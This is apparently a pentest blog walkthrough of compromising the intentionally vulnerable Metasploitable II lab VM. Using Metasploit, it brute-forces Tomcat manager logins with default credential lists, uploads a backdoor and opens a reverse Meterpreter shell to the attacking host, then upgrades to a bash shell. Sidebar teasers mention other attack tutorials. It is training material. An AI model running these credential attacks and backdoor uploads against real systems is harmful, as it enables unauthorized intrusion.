Friday, February 7, 2020

Metasploitable II: Tomcat Manager Upload

First we start of with a brute force of some user and pass combinations against the tomcat server.

msf5 > use auxiliary/scanner/http/tomcat_mgr_login
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                Required  Description
   ----              ---------------                                                                --------  -----------
   BLANK_PASSWORDS   false                                                                          no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                              yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                          no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                          no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                          no        Add all users in the current database to the list
   PASSWORD                                                                                         no        The HTTP password to specify for authentication
   PASS_FILE         /home/sam/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT             8080                                                                           yes       The target port (TCP)
   SSL               false                                                                          no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                          yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                  yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                              yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                         no        The HTTP username to specify for authentication
   USERPASS_FILE     /home/sam/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                          no        Try the username as the password for all users
   USER_FILE         /home/sam/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                           yes       Whether to print output for all attempts
   VHOST                                                                                            no        HTTP server virtual host

msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf5 auxiliary(scanner/http/tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[+] 192.168.56.101:8180 - Login Successful: tomcat:tomcat
[-] 192.168.56.101:8180 - LOGIN FAILED: both:both (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/tomcat_mgr_login) >

As you can see we got a Login Successful: tomcat:tomcat for one of the logins to the remote server. Our next step is to upload a backdoor to the server and get shell access.

msf5 > use exploit/multi/http/tomcat_mgr_upload 
msf5 exploit(multi/http/tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword tomcat
HttpPassword => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8180
RPORT => 8180
msf5 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying V84r2oLgqHQgPw...
[*] Executing V84r2oLgqHQgPw...
[*] Undeploying V84r2oLgqHQgPw ...
[*] Sending stage (53928 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.101:55925) at 2020-02-07 12:49:35 -0700

meterpreter > shell
Process 1 created.
Channel 1 created.
id  
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat55@metasploitable:/$ pwd
pwd
/
tomcat55@metasploitable:/$

As you can see we got shell access now where we can escalate our privileges with some other exploit.

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • bWAPP CSRF
    CSRF (Change Password) The first challenge is the change password CSRF. Our goal is to successfully change the users password with out log...
  • Metasploitable II: Samba Shares
    Lets first start off with an nmap scan of the remote host. root@ubuntu:~# nmap -p 139,445 -sV -sC 192.168.56.101 Starting Nmap 7.60 ( ht...
  • DVWA: File Upload
    Our goal is to exploit the weakness in file upload checking and obtain a remote system shell on the host. We start off with the security b...
  • bWAPP XSS Injections
    Cross-site-Scripting - Reflected (GET) Payload: <script>alert(1)</script> Cross-site-Scripting - Reflected (POST) Payload:...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...